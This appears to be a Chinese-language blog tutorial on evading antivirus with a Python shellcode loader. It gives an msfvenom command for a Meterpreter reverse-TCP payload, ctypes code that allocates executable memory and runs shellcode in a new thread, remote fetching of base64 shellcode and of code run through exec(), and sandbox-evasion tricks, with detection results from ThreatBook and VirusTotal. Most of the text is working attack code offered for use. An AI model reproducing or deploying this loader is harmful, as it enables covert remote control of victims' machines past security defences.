本文思路:
调用WindowAPI、采用shellcode无落地、代码无落地、远程加载、恶意代码加密;
查杀情况,本文以微步云沙箱、VirusTotal测试为主::
本次使用msf生成的shellcode
具体命令如下:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=xxx.x.x.x lport=80xx --encrypt base64 -f c
连接一样很丝滑
def run1(shellcode):
# windows api
PAGE_EXECUTE_READWRITE = 0x00000040 # 区域可执行代码,可读可写
MEM_COMMIT = 0x3000 # 分配内存
# PROCESS_ALL_ACCESS = (0x000F0000 | 0x00100000 | 0xFFF) # 给予进程所有权限
VirtualAlloc = windll.kernel32.VirtualAlloc
RtlMoveMemory = windll.kernel32.RtlMoveMemory
CreateThread = windll.kernel32.CreateThread
WaitForSingleObject = windll.kernel32.WaitForSingleObject
VirtualAlloc.restype = ctypes.c_void_p # 重载函数返回类型为void
p = VirtualAlloc(c_int(0), c_int(len(shellcode)), MEM_COMMIT, PAGE_EXECUTE_READWRITE) # 申请内存
buf = (c_char * len(shellcode)).from_buffer(shellcode) # 将shellcode指向指针
RtlMoveMemory(c_void_p(p), buf, c_int(len(shellcode))) # 复制shellcode进申请的内存中
h = CreateThread(c_int(0), c_int(0), c_void_p(p), c_int(0), c_int(0), pointer(c_int(0))) # 执行创建线程
WaitForSingleObject(c_int(h), c_int(-1)) # 检测线程创建事件
以上是使用windowAPI进行加载shellcode,先声明,在申请内存,给权限,创建线程
encode_shellcode=requests.get("http://xxx.x.x.x:80xx/cccc.txt").text
shellcode=bytearray(base64.b64decode(encode_shellcode))
from ctypes import *
from ctypes.wintypes import *
import sys
import requests
import base64
import time
encode_shellcode=requests.get("http://xxx.x.x.x:80xx/cccc.txt").text
shellcode=bytearray(base64.b64decode(encode_shellcode))
def run1(shellcode):
# windows api
PAGE_EXECUTE_READWRITE = 0x00000040 # 区域可执行代码,可读可写
MEM_COMMIT = 0x3000 # 分配内存
# PROCESS_ALL_ACCESS = (0x000F0000 | 0x00100000 | 0xFFF) # 给予进程所有权限
VirtualAlloc = windll.kernel32.VirtualAlloc
RtlMoveMemory = windll.kernel32.RtlMoveMemory
CreateThread = windll.kernel32.CreateThread
WaitForSingleObject = windll.kernel32.WaitForSingleObject
# OpenProcess = windll.kernel32.OpenProcess
# VirtualAllocEx = windll.kernel32.VirtualAllocEx
# WriteProcessMemory = windll.kernel32.WriteProcessMemory
# CreateRemoteThread = windll.kernel32.CreateRemoteThread
VirtualAlloc.restype = ctypes.c_void_p # 重载函数返回类型为void
p = VirtualAlloc(c_int(0), c_int(len(shellcode)), MEM_COMMIT, PAGE_EXECUTE_READWRITE) # 申请内存
buf = (c_char * len(shellcode)).from_buffer(shellcode) # 将shellcode指向指针
RtlMoveMemory(c_void_p(p), buf, c_int(len(shellcode))) # 复制shellcode进申请的内存中
h = CreateThread(c_int(0), c_int(0), c_void_p(p), c_int(0), c_int(0), pointer(c_int(0))) # 执行创建线程
WaitForSingleObject(c_int(h), c_int(-1)) # 检测线程创建事件
if __name__ == "__main__":
time.sleep(10)
try:
if sys.argv[1]:
run1(shellcode)
except IndexError:
pass
2. VirusTotal
本次使用msf生成的shellcode
具体命令如下:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=xxx.x.x.x lport=80xx --encrypt base64 -f c
连接和上次一样,秒连
这次有所不同的是,使用了接收命令行参数,当命令行参数>1时才会启动程序,这样做的目的是减少云沙箱虚拟运行的风险(我个人认为)
完整源代码》》》》
from ctypes import *
from ctypes.wintypes import *
import sys
import requests
import base64
import time
try:
if sys.argv[1]:
encode_shellcode=requests.get("http://xxx.x.x.x:80xx/cccc.txt").text
shellcode=bytearray(base64.b64decode(encode_shellcode))
func = requests.get("http://xxx.x.x.x:80xx/uuuu.txt").text
func = base64.b64decode(func)
exec(func)
except IndexError:
pass